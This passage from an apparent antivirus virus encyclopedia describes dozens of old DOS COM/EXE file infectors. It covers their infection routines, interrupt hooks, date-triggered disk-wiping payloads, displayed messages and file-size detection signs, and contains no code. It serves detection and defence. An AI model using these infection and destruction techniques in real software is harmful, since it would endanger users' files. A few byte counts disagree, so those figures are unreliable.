  11502. Virus Name: Scribble
  11503. Virus Type: COM & EXE File infector
  11504. Virus Length:
  11505.  
  11506. Executing Procedure:
  11507. Virus searches for all uninfected COM & EXE files on current
  11508. directory, then infects them.
  11509.  
  11510. Damage: It will overwrite original files with a virus code.
  11511. Original files are destroyed.
  11512.  
  11513. Note:
  11514. 1) It does not stay resident in memory.
  11515. 2) You will see an error message when writing because INT 24h has
  11516.    not been hanged.
  11517.  
  11518. [Simple 1992]
  11519. Virus Name: Simple-1992
  11520. Virus Type: COM File infector
  11521. Virus Length:  424 bytes
  11522.  
  11523. Executing Procedure:
  11524. Virus searches for all uninfected COM files on current directory,
  11525. then infects them. (Virus will infect COMMAND.COM)
  11526.  
  11527. Damage: None
  11528.  
  11529. Note:
  11530. 1) It does not stay resident in memory.
  11531. 2) You will see an error message when writing because INT 24h has
  11532.    not been hanged.
  11533.  
  11534. Detecting Method: Infected file sizes increase by 424 bytes.
  11535.  
  11536. [Schrunch]
  11537. Virus Name: Schrunch
  11538. Virus Type: COM File infector
  11539. Virus Length:  420 bytes
  11540.  
  11541. Executing Procedure:
  11542. Virus displays the following message:
  11543.  
  11544.     "S C H R U N CH     E M     U P  T I M E."
  11545.  
  11546. Virus searches for all uninfected COM files on current directory,
  11547. then proceeds to infect them.
  11548.  
  11549. Damage: None
  11550.  
  11551. Note:
  11552. 1) It does not stay resident in memory.
  11553. 2) You will see an error message when writing because INT 24h has
  11554.    not been hanged.
  11555.  
  11556. Detecting Method:
  11557. 1) Infected file sizes increase by 420 bytes.
  11558. 2) Virus will display above message when a file is executed.
  11559.  
  11560. [CV4]
  11561. Virus Name: Cv4
  11562. Virus Type: COM File infector
  11563. Virus Length:  321 bytes
  11564.  
  11565. Executing Procedure:
  11566. Virus displays the following message:
  11567.  
  11568.     "This file infected with COMVIRUS 1.0."
  11569.  
  11570. Virus then searches for an uninfected COM file on current
  11571. directory and proceeds to infect it (Infects only one file at a
  11572. time).
  11573.  
  11574. Damage: None
  11575.  
  11576. Note:
  11577. 1) It does not stay resident in memory.
  11578. 2) You will see an error message when writing because INT 24h has
  11579.    not been hanged.
  11580.  
  11581. Detecting Method:
  11582. 1) Infected file sizes increase by 321 bytes.
  11583. 2) Virus displays above message when infected file is executed.
  11584.  
  11585. [Arcv-3A]
  11586. Virus Name: Arcv-3a
  11587. Virus Type: COM File infector
  11588. Virus Length:  657 bytes
  11589.  
  11590. Executing Procedure:
  11591. Virus searches for all uninfected COM files on current directory,
  11592. then infects them. Then it will check whether current calendar
  11593. month is February. If it is, virus displays the following:
  11594.  
  11595.     "I've just Found a Virus.. Oops.. Sorry I'm the virus...Well
  11596.      let me introduce myself.. I am ARCV-3 Virus, by Apache
  11597.      Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote
  11598.      Yes to the Best Vote ARCV..."
  11599.  
  11600. Damage: None
  11601.  
  11602. Note:
  11603. 1) It does not stay resident in memory.
  11604. 2) You will see an error message when writing because INT 24h has
  11605.    not been hanged.
  11606.  
  11607. Detecting Method: Infected file sizes increase by 657 bytes.
  11608.  
  11609. [Anti_Daf]
  11610. Virus Name: Anti_Daf
  11611. Virus Type: COM File infector
  11612. Virus Length:  561 bytes
  11613.  
  11614. Executing Procedure:
  11615. Virus searches for an uninfected COM file on current directory,
  11616. then infects it (Infects only one file at a time).   Then it will
  11617. check whether current month is November, and tha the current day
  11618. is Monday. If these requirements are met, virus displays a
  11619. message, and then destroys all data on hard diskette. The virus
  11620. displays the following message :
  11621.  
  11622.     "The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan
  11623.      1..postbus 90063..6500 PREindhoven, The Netherlands.  .. DAF
  11624.      sucks..... (c) 1992 Dark Helmet & The Virus Research Centre"
  11625.  
  11626. Damage: Virus will sometimes destroy all data on hard diskette.
  11627.  
  11628. Note:
  11629. 1) It does not stay resident in memory.
  11630. 2) You will see an error message when writing because INT 24h has
  11631.    not been hanged.
  11632.  
  11633. Detecting Method: Infected file sizes increase by 561 bytes.
  11634.  
  11635. [Manola]
  11636. Virus Name: Manola
  11637. Virus Type: COM File infector
  11638. Virus Length:  831 bytes
  11639.  
  11640. Executing Procedure:
  11641. Virus checks whether current day is 7th. If it is, virus displays
  11642. the following message and reboots the system:
  11643.  
  11644.     "The Atomic Dustbin 2B - I'm Here To Stay".
  11645.  
  11646. If the above requirements are not met, virus searches for an
  11647. uninfected COM file on current directory, and infects it (Infects
  11648. only one file at a time).
  11649.  
  11650. Damage: Virus will sometimes reboot the system.
  11651.  
  11652. Note:
  11653. 1) It does not stay resident in memory.
  11654. 2) You will see an error message when writing because INT 24h has
  11655.    not been hanged.
  11656.  
  11657. Detecting Method: Infected file sizes increase by 831 bytes.
  11658.  
  11659. [Seneca-A]
  11660. Virus Name: Seneca-A
  11661. Virus Type: EXE File infector
  11662. Virus Length:
  11663.  
  11664. Executing Procedure:
  11665. Virus searches for all uninfected EXE files on current directory,
  11666. then infects them. It will check whether current date is November
  11667. 25. If it is, virus displays the following message and destroys
  11668. all data on hard diskette:
  11669.  
  11670.         "Its Seneca's B_DAY
  11671.          let's party   !!!"
  11672.  
  11673. Damage: Virus will sometimes destroy all data on hard diskette.
  11674.  
  11675. Note:
  11676. 1) It does not stay resident in memory.
  11677. 2) You will see an error message when writing because INT 24h has
  11678.    not been hanged.
  11679.  
  11680. [Seneca-B]
  11681. Virus Name: SENECA-B
  11682. Virus Type: File infector
  11683. Virus Length:
  11684.  
  11685. Executing Procedure:
  11686. Virus searches for all (*.*) uninfected files on current
  11687. directory, then infects them. It will check whether current date
  11688. is November 25. If it is, virus displays the following message
  11689. and destroys all data on hard diskette:
  11690.  
  11691.         "Its Seneca's B_DAY
  11692.          let's party   !!!"
  11693.  
  11694. Damage: Virus will sometimes destroy all data on hard diskette.
  11695.  
  11696. Note:
  11697. 1) It does not stay resident in memory.
  11698. 2) You will see an error message when writing because INT 24h has
  11699.    not been hanged.
  11700.  
  11701. [Mog]
  11702. Virus Name: Mog
  11703. Virus Type: COM File infector
  11704. Virus Length:  328 bytes
  11705.  
  11706. Executing Procedure:
  11707. Virus searches for all uninfected COM files on current directory,
  11708. then infects them. Virus will then display the following message:
  11709.  
  11710.     " Maccabi Yafo !!!!!"
  11711.  
  11712. No matter whether it could find an uninfected COM file or not, It
  11713. will check whether current date is February 25. If it is, virus
  11714. will halt the system.
  11715.  
  11716. Damage: Virus will sometimes halt the system.
  11717.  
  11718. Note:
  11719. 1) It does not stay resident in memory.
  11720. 2) You will see an error message when writing because INT 24h has
  11721.    not been hanged.
  11722.  
  11723. Detecting Method: Infected file sizes increase by 328 bytes.
  11724.  
  11725. [LZ2]
  11726. Virus Name: Lz2
  11727. Virus Type: EXE File infector
  11728. Virus Length:  3000-8000 bytes
  11729.  
  11730. Executing Procedure:
  11731. Virus searches for an uninfected COM file on current directory,
  11732. then infects it (Infects only one file at a time). The method of
  11733. infection is: creates a new COM file with the same name as the
  11734. EXE file.   This new COM file is the virus. Its length is
  11735. 3000-8000 bytes.
  11736.  
  11737. Damage: None
  11738.  
  11739. Note:
  11740. 1) It does not stay resident in memory.
  11741. 2) You will see an error message when writing because INT 24h has
  11742.    not been hanged.
  11743. 3) The procedure at the beginning of virus is Encrypted in LZEXE
  11744.    mode. PCSCAN cannot scan this virus.
  11745.  
  11746. [Silver-3D]
  11747. Virus Name: Silver-3d
  11748. Virus Type: COM & EXE File infector
  11749. Virus Length:
  11750.  
  11751. Executing Procedure:
  11752. Virus searches for an uninfected COM or EXE file on current
  11753. directory, then infects it. It  will infect four files at a time.
  11754. Virus then displays the following message:
  11755.  
  11756.     "Program too big to fit in memory."
  11757.  
  11758. Damage:
  11759. 1) It will overwrite original files with a virus code. Original
  11760.    files are destroyed.
  11761. 2) If virus cannot find an uninfected file, it will display "PLO
  11762.    VIRUS RESEARCH TEAM" in enlarged font.  Virus then halts
  11763.    system.
  11764.  
  11765. Detecting Method:
  11766. 1) The length of infected COM files is 8101 bytes.
  11767. 2) Executed infected files will display the following message:
  11768.  
  11769.    "Program too big to fit in memory" or
  11770.    "PLO VIRUS RESEARCH TEAM."
  11771.  
  11772. [Silly-Willy]
  11773. Virus Name: Silly-Willy
  11774. Virus Type: COM & EXE File infector
  11775. Virus Length:
  11776.  
  11777. Executing Procedure:
  11778. 1) When executing an infected COM program, it will infect files
  11779.    only when current year is between 1988 and 1992.  When
  11780.    infecting files,  virus will search for an uninfected COM and
  11781.    EXE file on current directory, then infects them.  Virus will
  11782.    infect only one COM file and EXE file at a time.
  11783. 2) Executing an infected EXE program will not infect other files.
  11784.    At this time, a smiling face is displayed on the screen
  11785.    Furthermore, when any key is depressed, the following message
  11786.    will be displayed:
  11787.  
  11788.    "Hello ! I'm Silly-Willy
  11789.     Now, I'm formatting your HARDDISK.........."
  11790.  
  11791.    (It does not really format hard disk). If there is a diskette
  11792.    in drive A, all data on this diskette will be destroyed and
  11793.    virus will proceed to hang the system.
  11794.  
  11795. Damage: Virus will sometimes destroy all data on diskette in
  11796. drive A and halt system.
  11797.  
  11798. [Stupid 1]
  11799. Virus Name: Stupid 1, July 4
  11800. Virus Type: COM File infector
  11801. Virus Length:  743 bytes
  11802.  
  11803. Executing Procedure:
  11804. 1) If word at address 0000:01FEh is FFFFh, virus will not infect
  11805.    any file.
  11806. 2) When virus infects files, it will infect all uninfected COM
  11807.    files on current directory. If number of infection is less
  11808.    than 2, it will go on infecting all COM files on upper
  11809.    directory until the number is larger then 2 or it has reached
  11810.    root directory. It will check whether current date is July 4
  11811.    and that current time is either  0:00am, 1:00am, 2:00am,
  11812.    3:00am, 4:00am, or 5:00am. If any of these times are met,
  11813.    virus will proceed to destroy data on current diskette.
  11814.  
  11815. Detecting Method:
  11816. 1) Date and time of infected files changed.
  11817. 2) Byte at 0003h of infected COM file is 1Ah.
  11818. 3) Infected COM file displays the following message:
  11819.  
  11820.          "Abort, Retry, Ignore, Fail?" ,
  11821.          "Fail on INT 24"
  11822.    (2) - "Impotence error reading users disk"
  11823.    (0) - "Program too big to fit in memory"
  11824.    (1) - "Cannot load COMMAND, system halted"
  11825.    (3)"Joker!" and "*.com."
  11826.  
  11827. 4) Virus will display the above message when executing an
  11828.    infected file.
  11829.  
  11830. [Klf-356]
  11831. Virus Name: Klf-356
  11832. Virus Type: COM File infector
  11833. Virus Length:  356 bytes
  11834.  
  11835. Executing Procedure:
  11836. Checks whether it has stayed resident in memory. If not, it will
  11837. stay resident in high memory. Then hooks INT 21h and goes back to
  11838. original routine.
  11839.  
  11840. Vectors hooked:
  11841. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11842. 24h to prevent divulging its trace when writing. If the program
  11843. to be executed is an uninfected COM file, virus proceeds to
  11844. infect it.
  11845.  
  11846. Damage: None
  11847.  
  11848. Detecting Method: Infected file sizes increase by 356 bytes.
  11849.  
  11850. [April, 1998]
  11851. Virus Name: April, 1998
  11852. Virus Type: Virus infects .EXE files which are greater than 10h.
  11853.             Virus is a memory resident.
  11854. Virus Length: 998 bytes on file and 1104 bytes in memory.
  11855.  
  11856. Interrupt Vectors Hooked: INT 21h.
  11857.  
  11858. Infection Process: This virus is spread by executing an infected
  11859. program. When an April, 1998 infected program is executed, it will
  11860. check to see if it already resident in memory.  If so, it will
  11861. execute the infected program. Virus stays resident at the top of
  11862. the MCB (memory control block) but below the DOS 640k boundary.
  11863.  
  11864. Damage: Virus writes garbage to C drive from relative sector 0 to
  11865. sector Feh when system date is April of any year.
  11866.  
  11867. Symptoms:  The available free memory will decrease by 1104 bytes.
  11868.  
  11869. Note: This virus doesn't infect files named as: "SCAN*", "CLEA*",
  11870. "VIRS*","F-PR*" OR "CPAV*"
  11871.  
  11872. [17-768]
  11873. Virus Name:  17-768
  11874. Virus Type: Virus Infects .COM and .EXE files shorter than 59920
  11875.             bytes. Memory resident.
  11876. Virus Length: 768 (300h) bytes on File and . 800 (320h) bytes in
  11877.               memory.
  11878. Interrupt Vectors Hooked: INT 09h and 21h.
  11879.  
  11880. Infection Process: This virus is a variant of the November-17th
  11881. virus: If the system date is equal to 17 November, and the value
  11882. of [40:46E] not the same as the virus backup value of [40:46E]
  11883. when the virus is resident, it will destroy current disk beginning
  11884. from sector 1 to sector 8.  The first time a program infected
  11885. with November 17th is executed, the virus will install itself
  11886. memory resident at the top of system  memory but below the 640K
  11887. DOS boundary.
  11888.  
  11889. Damage: Virus destroys current disk from sector 1 to sector 8. By
  11890. progressive  action, virus will insert garbage in these sectors
  11891. when the date is the 17th of November.
  11892.  
  11893. Symptoms:  File size increase of 855 bytes. Available free memory
  11894. decreases by 896 bytes.
  11895.  
  11896. Note: The November 17th virus was received in January, 1992.  Its
  11897. origin or point of original isolation was originally unknown, but
  11898. it has since been reported as being widespread in Rome, Italy in
  11899. December 1991.  November 17th is a memory resident infector of
  11900. .COM and .EXE programs, including COMMAND.COM.
  11901.  
  11902. [Jeff]
  11903. Virus Name: Jeff
  11904. Virus Type: COM File infector
  11905. Virus Length:  815-820 bytes
  11906.  
  11907. Executing Procedure:
  11908. Virus searches for an uninfected COM file on current directory,
  11909. then infects it. It only infects one file at a time.
  11910.  
  11911. Damage: None
  11912.  
  11913. Note:
  11914. 1) Does not stay in memory.
  11915. 2) You will see an error message when writing because INT 24h has
  11916.    not been hanged.
  11917.  
  11918. Detecting Method: Infected file sizes increase by 815-820 bytes.
  11919.  
  11920. [Ill]
  11921. Virus Name: Ill
  11922. Virus Type: COM File infector
  11923. Virus Length:  1016 bytes
  11924.  
  11925. Executing Procedure:
  11926. Virus searches for an uninfected COM file on current directory,
  11927. then infects it. It only infects one file at a time.
  11928.  
  11929. Damage: None
  11930.  
  11931. Note:
  11932. 1) Does not stay in memory.
  11933. 2) You will see an error message when writing because INT 24h has
  11934.    not been hanged.
  11935.  
  11936. Detecting Method: Infected file sizes increase by 1016 bytes.
  11937.  
  11938. [Iero-512-560]
  11939. Virus Name: Iero-512-560
  11940. Virus Type: COM File infector
  11941. Virus Length:  512 or 560 bytes
  11942.  
  11943. Executing Procedure:
  11944. Checks whether it has stayed resident in memory. If not, it will
  11945. stay resident in high memory. Then hooks INT 21h and goes back to
  11946. original routine.
  11947.  
  11948. Vectors hooked:
  11949. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11950. executed is an uninfected COM file, virus proceeds to infect it.
  11951. Hooks INT 08h to check current time at all times. At some random
  11952. point in time, it will display the following message:
  11953.  
  11954.     "Mulier pulchr aest janua diab oli , .. via iniq uitatis,
  11955.     scorpion is percussio. .St. Ieronim.."
  11956.  
  11957. Damage: None
  11958.  
  11959. Note:
  11960. 1) You will see an error message when writing because INT 24h has
  11961.    not been hanged.
  11962. 2) It will decrease memory size by 1 while virus is residing in
  11963.    memory (You can see this when using MEM.EXE)
  11964.  
  11965. Detecting Method: Infected file sizes increase by 512 or 560
  11966. bytes.
  11967.  
  11968. [Iernim]
  11969. Virus Name: Iernim
  11970. Virus Type: COM File infector
  11971. Virus Length:  570 or 600 bytes
  11972.  
  11973. Executing Procedure:
  11974. Checks whether it has stayed resident in memory. If not, it will
  11975. stay resident in high memory. Then hooks INT 21h and goes back to
  11976. original routine.
  11977.  
  11978. Vectors hooked:
  11979. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11980. executed is an uninfected COM file, virus proceeds to infect it.
  11981. Hooks INT 08h to check current time at all times. At some random
  11982. point in time, it will display the following message:
  11983.  
  11984.     "Mulier pulchra est janua diaboli , .. via iniquitatis,
  11985.     scorpionis percussio ..St. Ieronim.."
  11986.  
  11987. Damage: None
  11988.  
  11989. Note:
  11990. 1) You will see an error message when writing because INT 24h has
  11991.    not been hanged.
  11992. 2) It will decrease memory size by 1 while virus is residing in
  11993.    memory (You can see this when using MEM.EXE)
  11994.  
  11995. Detecting Method: Infected file sizes increase by 570 or 600
  11996. bytes.
  11997.  
  11998. [Horror]
  11999. Virus Name: Horror
  12000. Virus Type: COM & EXE File infector
  12001. Virus Length:  1112-1182 bytes
  12002.  
  12003. Executing Procedure:
  12004. Checks whether it has stayed resident in memory. If not, it will
  12005. stay resident in high memory. Then hooks INT 21h, and then checks
  12006. whether COMMAND.COM that booted up system has been infected or
  12007. not. If not , virus infects it and goes back to original routine.
  12008.  
  12009. Vectors hooked:
  12010. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12011. 24h to prevent divulging its trace when writing. If the program
  12012. to be executed is an uninfected COM or EXE file, virus proceeds
  12013. to infect it.
  12014.  
  12015. Damage: It will destroy all data on hard disk (Every variant of
  12016. the virus has its own infecting time).
  12017.  
  12018. Note: The Soft-mice software is destroyed by infected EXE
  12019. programs.
  12020.  
  12021. Detecting Method: Infected file sizes increase by 1112-1182
  12022. bytes.
  12023.  
  12024. [I-B]
  12025. Virus Name: I-B
  12026. Virus Type: COM File infector
  12027. Virus Length:
  12028.  
  12029. Executing Procedure:
  12030. Virus searches for all uninfected COM files on all directory, and
  12031. infects them. No matter whether it has infected a file or not,
  12032. this virus will check whether current day  is Monday. If it is,
  12033. virus proceeds to destroy all data  on hard diskette.
  12034.  
  12035. Damage:
  12036. 1) It will sometimes destroy all data on hard diskette.
  12037. 2) It will overwrite original files with a virus code. Original
  12038.    files are destroyed.
  12039.  
  12040. Note:
  12041. 1) Does not stay in memory.
  12042. 2) You will see an error message when writing because INT 24h has
  12043.    not been hanged.
  12044.  
  12045. [Cr-2480b]
  12046. Virus Name: Cr-2480b
  12047. Virus Type: COM File infector
  12048. Virus Length:  2480 bytes
  12049.  
  12050. Executing Procedure:
  12051. Virus searches for an uninfected COM file on current directory,
  12052. then infects it (It only infects one file at a time).
  12053.  
  12054. Damage: None
  12055.  
  12056. Note:
  12057. 1) Does not stay in memory.
  12058. 2) You will see an error message when writing because INT 24h has
  12059.    not been hanged.
  12060.  
  12061. Detecting Method: Infected file sizes increase by 2480 bytes.
  12062.  
  12063. [Md-354]
  12064. Virus Name: Md-354
  12065. Virus Type: COM File infector
  12066. Virus Length:  354 bytes
  12067.  
  12068. Executing Procedure:
  12069. Virus searches for an uninfected COM file on current directory,
  12070. then infects it (It only infects one file at a time).
  12071.  
  12072. Damage: None
  12073.  
  12074. Note:
  12075. 1) Does not stay in memory.
  12076. 2) You will see an error message when writing because INT 24h has
  12077.    not been hanged.
  12078.  
  12079. Detecting Method: Infected file sizes increase by 354 bytes.
  12080.  
  12081. [Los-693]
  12082. Virus Name: Los-693
  12083. Virus Type: COM File infector
  12084. Virus Length: 693 bytes
  12085.  
  12086. Executing Procedure:
  12087. Checks whether it has stayed resident in memory. If not, it will
  12088. stay resident in high memory. Then hooks INT 21h and goes back to
  12089. original routine.
  12090.  
  12091. Vectors hooked:
  12092. Hooks INT 21H (AH=4Bh) to infect files. First, it will hang INT
  12093. 24h to prevent divulging its trace when writing. If the program
  12094. to be executed is an uninfected COM file, virus proceeds to
  12095. infect it.
  12096.  
  12097. Damage:
  12098. There is a flag of virus in partition (Initial value is zero).
  12099. The value will increase by 1 every time virus infects a file. When
  12100. the value of flag is larger than 223, it will hook INT 08h. A
  12101. minute later, characters on screen fall down. Then, virus halts
  12102. system.
  12103.  
  12104. Detecting Method: Infected file sizes increase by 693 bytes.
  12105.  
  12106. [Bung1422]
  12107. Virus Name: Bung1422
  12108. Virus Type: COM File infector
  12109. Virus Length: 1442 bytes
  12110.  
  12111. Executing Procedure:
  12112. Checks whether it has stayed resident in memory. If not, it will
  12113. stay resident in high memory. Then hooks INT 21h and goes back to
  12114. original routine. This virus will check whether current date is
  12115. September 20. If it is, virus displays the following message:
  12116.  
  12117.     "Jonhan Bonhn  - September 20 1980
  12118.     -  L E D  Z E P P E L I N  -"
  12119.  
  12120. Vectors hooked:
  12121. Hooks INT 21H(AH=4Bh). First, it will hang INT 24h to prevent
  12122. divulging its trace when writing. If the program to be executed
  12123. is an uninfected COM file, virus infects it directly. If the
  12124. program to be executed is an  EXE file, it will search for an
  12125. uninfected COM file and infect this COM file. Finally, virus
  12126. restores INT 24h.
  12127.  
  12128. Damage: None
  12129.  
  12130. Detecting Method: Infected file sizes increase by 1422 bytes.
  12131.  
  12132. [Src-377]
  12133. Virus Name: Src-377
  12134. Virus Type: COM File infector
  12135. Virus Length: 377 bytes
  12136.  
  12137. Executing Procedure:
  12138. Virus searches for all uninfected COM files on all directories,
  12139. and proceeds to infect them.
  12140.  
  12141. Damage:
  12142. When hard disk divides into more than one partition, and system
  12143. is booted up from second partition (D drive), all data on this
  12144. drive will be destroyed.
  12145.  
  12146. Note:
  12147. 1) Does not stay in memory.
  12148. 2) You will see an error message when writing because INT 24h has
  12149.    not been hanged.
  12150.  
  12151. Detecting Method: Infected file sizes increase by 377 bytes.
  12152.  
  12153. [Mini-195]
  12154. Virus Name: Mini-195
  12155. Virus Type: COM File infector
  12156. Virus Length: 195 or 218 bytes
  12157.  
  12158. Executing Procedure:
  12159. Virus searches for an uninfected #*.COM file ("#" indicates a
  12160. character from 'A' to 'Z', like A*.com, F*.COM, X*.COM) on
  12161. current directory, and virus proceeds to infect them.
  12162.  
  12163. Damage: None
  12164.  
  12165. Note:
  12166. 1) Does not stay in memory.
  12167. 2) You will see an error message when writing because INT 24h has
  12168.    not been hanged.
  12169.  
  12170. Detecting Method: Infected file sizes increase by 195 or 218
  12171. bytes.
  12172.  
  12173. [Gold]
  12174. Virus Name: Gold
  12175. Virus Type: COM & EXE File infector
  12176. Virus Length:  612 bytes
  12177.  
  12178. Executing Procedure:
  12179. Checks whether it has stayed resident in memory. If not, it will
  12180. stay resident in high memory. Then hooks INT 21h and goes back to
  12181. original routine.
  12182.  
  12183. Vectors hooked:
  12184. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12185. executed is an uninfected COM or EXE file, virus proceeds to
  12186. infect it. After it has infected the file, virus has a 50% chance
  12187. of going back to the original routine. The other possibility is
  12188. for the virus to display random characters and end without
  12189. executing original routine.
  12190.  
  12191. Damage: None
  12192.  
  12193. Note: You will see an error message when writing because INT 24h
  12194. has not been hanged.
  12195.  
  12196. Detecting Method: Infected file sizes increase by 612 bytes.
  12197.  
  12198. [Hard-Day]
  12199. Virus Name: Hard-Day
  12200. Virus Type: COM File infector
  12201. Virus Length:  662 bytes
  12202.  
  12203. Executing Procedure:
  12204. Checks whether it has stayed resident in memory. If not, it will
  12205. stay resident in high memory. Then hooks INT 21h and goes back to
  12206. original routine.
  12207.  
  12208. Vectors hooked:
  12209. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12210. executed is an uninfected COM file, virus proceeds to infect it.
  12211.  
  12212. Damage:
  12213. If current calendar day is Monday and current time is 18:00
  12214. later, the virus halts the system after displaying the following
  12215. message:
  12216.  
  12217.     "Hard day's night !"
  12218.  
  12219. Note: You will see an error message when writing because INT 24h
  12220. has not been hanged.
  12221.  
  12222. Detecting Method: Infected file sizes increase by 662 bytes.
  12223.  
  12224. [In83-584]
  12225. Virus Name: In83-584
  12226. Virus Type: COM File infector
  12227. Virus Length: 584 bytes
  12228.  
  12229. Executing Procedure:
  12230. Checks whether it has stayed resident in memory. If not, it will
  12231. stay resident in high memory. Then hooks INT 21h and goes back to
  12232. original routine.
  12233.  
  12234. Vectors hooked:
  12235. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12236. 24h to prevent divulging its trace when writing. If the program
  12237. to be executed is an uninfected COM file, virus proceeds to
  12238. infect it.
  12239.  
  12240. Damage: None
  12241.  
  12242. Detecting Method: Infected file sizes increase by 584 bytes.
  12243.  
  12244. [Tankard]
  12245. Virus Name: Tankard
  12246. Virus Type: COM File infector
  12247. Virus Length: 493 bytes
  12248.  
  12249. Executing Procedure:
  12250. Checks whether it has stayed resident in memory. If not, it will
  12251. stay resident in high memory. Then hooks INT 21h and goes back to
  12252. original routine.
  12253.  
  12254. Vectors hooked:
  12255. Hooks INT 21H (AH=4Bh) to infect files. First, it will hang INT
  12256. 24h to prevent divulging its trace when writing. If the program
  12257. to be executed is an uninfected COM file, virus proceeds to
  12258. infect it.
  12259.  
  12260. Damage: None
  12261.  
  12262. Detecting Method: Infected file sizes increase by 493 bytes.
  12263.  
  12264. [1241]
  12265. Virus Name: 1241
  12266. Virus Type: COM & EXE File infector
  12267. Virus Length: 1560-1570 bytes
  12268.  
  12269. Executing Procedure:
  12270. Virus checks whether current calendar date is later than November
  12271. 13, 1990. If it is, virus displays the following message:
  12272.  
  12273.     "St Cruz, Dili, 1991 Nov 12.
  12274.     Lusitania Expresso,
  12275.     Freedom for East Timor !"
  12276.  
  12277. Then reboots system. Otherwise, it will check whether it has
  12278. stayed resident in memory. If not, it will stay resident in high
  12279. memory. Then hooks INT 21h and goes  back to original routine.
  12280.  
  12281. Vectors hooked:
  12282. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12283. executed is an uninfected COM or EXE file, virus proceeds to
  12284. infect it.
  12285.  
  12286. Damage: None
  12287.  
  12288. Detecting Method: Infected file sizes increase by 1560-1570
  12289. bytes.
  12290.  
  12291. [104]
  12292. Virus Name: 104
  12293. Virus Type: COM File infector
  12294. Virus Length: 400 bytes
  12295.  
  12296. Executing Procedure:
  12297. Checks whether it has stayed resident in memory. If not, it will
  12298. stay resident in high memory. Then hooks INT 21h and goes back to
  12299. original routine.
  12300.  
  12301. Vectors hooked:
  12302. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12303. executed is an uninfected COM file, virus proceeds to infect it.
  12304.  
  12305. Damage: None
  12306.  
  12307. Note: You will see an error message when writing because INT 24h
  12308. has not been hanged.
  12309.  
  12310. Detecting Method: Infected file sizes increase by 400 bytes.
  12311.  
  12312. [Trident]
  12313. Virus Name: Trident
  12314. Virus Type: COM & EXE File infector
  12315. Virus Length: 2385-2395 bytes
  12316.  
  12317. Executing Procedure:
  12318. Checks whether it has stayed resident in memory. If not, it will
  12319. stay resident in high memory. Then hooks INT 21h and goes back to
  12320. original routine.
  12321.  
  12322. Vectors hooked:
  12323. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  12324. 24h to prevent divulging its trace when writing. Then when you
  12325. type  Dir" command (like DIR H*.*), virus infects all uninfected
  12326. COM & EXE files accessed through  Dir" command.
  12327.  
  12328. Damage: None
  12329.  
  12330. Detecting Method: Infected file sizes increase by 2385-2395
  12331. bytes.
  12332.  
  12333. [Explode]
  12334. Virus Name: Explode
  12335. Virus Type: COM File infector
  12336. Virus Length:
  12337.  
  12338. Executing Procedure:
  12339. Virus searches for all uninfected COM files on current directory,
  12340. then proceeds to infect them. No matter whether it has infected a
  12341. file or not, it will check whether current month is April or May.
  12342. If it is, virus will display the following message:
  12343.  
  12344.     "Your hard drive is about to explode !"
  12345.  
  12346. Virus then destroys all data on hard diskette.  If calendar shows
  12347. months other than April and May, virus displays :
  12348.  
  12349.     "Program too big to fit in memory."
  12350.  
  12351. Damage:
  12352. 1) It will sometimes destroy all data on hard diskette.
  12353. 2) It will overwrite original files with a virus code. Original
  12354.    files are destroyed.
  12355.  
  12356. Note:
  12357. 1) It does not stay resident in memory.
  12358. 2) You will see an error message when writing because INT 24h has
  12359.    not been hanged.
  12360.  
  12361. [End-Of]
  12362. Virus Name: End-Of
  12363. Virus Type: COM File infector
  12364. Virus Length: 783 bytes
  12365.  
  12366. Executing Procedure:
  12367. Checks whether it has stayed resident in memory. If not, it will
  12368. stay resident in high memory. Then hooks INT 21h and goes back to
  12369. original routine.
  12370.  
  12371. Vectors hooked:
  12372. Hooks INT 21H(AH=3Bh) to infect files. When accessing other
  12373. directories, all uninfected COM files on original directory will
  12374. be infected.
  12375.  
  12376. Damage: None
  12377.  
  12378. Note: You will see an error message when writing because INT 24h
  12379. has not been hanged.
  12380.  
  12381. Detecting Method: Infected file sizes increase by 783 bytes.
  12382.  
  12383. [Copyr-Ug]
  12384. Virus Name: Copyr-Ug
  12385. Virus Type: COM & EXE File infector
  12386. Virus Length: 766 bytes
  12387.  
  12388. Executing Procedure:
  12389. Checks whether it has stayed resident in memory. If not, it will
  12390. stay resident in high memory. Then hooks INT 21h and goes back to
  12391. original routine.
  12392.  
  12393. Vectors hooked:
  12394. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12395. executed is an uninfected COM or EXE file, virus proceeds to
  12396. infect it.
  12397.  
  12398. Damage: None
  12399.  
  12400. Note: You will see an error message when writing because INT 24h
  12401. has not been hanged.
  12402.  
  12403. Detecting Method: Infected file sizes increase by 766 bytes.
  12404.  
  12405. [Chuang]
  12406. Virus Name: Chuang
  12407. Virus Type: COM & EXE File infector
  12408. Virus Length:  970 bytes
  12409.  
  12410. Executing Procedure:
  12411. Virus searches for an uninfected COM file on current directory,
  12412. then infects it (It infects only one file at a time). No matter
  12413. whether it has infected a file or not, it will check whether
  12414. current calendar day is later   than 12, and that current time is
  12415. 22:00 or later. If these specifications are met, virus destroys
  12416. all data on hard diskette.
  12417.  
  12418. Damage:  Virus will sometimes destroy all data on hard diskette.
  12419.  
  12420. Note:
  12421. 1) It does not stay resident in memory.
  12422. 2) You will see an error message when writing because INT 24h has
  12423.    not been hanged.
  12424.  
  12425. Detecting Method: Infected file sizes increase by 970 bytes.
  12426.  
  12427. [Ancient]
  12428. Virus Name: Ancient
  12429. Virus Type: COM File infector
  12430. Virus Length:  783 bytes
  12431.  
  12432. Executing Procedure:
  12433. Virus searches for an uninfected COM file on current directory,
  12434. then infects it (It infects only one file at a time). Screen will
  12435. then be cleaned or will display various colors of ' * ' until a
  12436. key is depressed. At that time, a strange sound will emit for
  12437. approx. 5 minutes. After which, the virus will return to the
  12438. original program.
  12439.  
  12440. Damage: None
  12441.  
  12442. Note:
  12443. 1) It does not stay resident in memory.
  12444. 2) You will see an error message when writing because INT 24h has
  12445.    not been hanged.
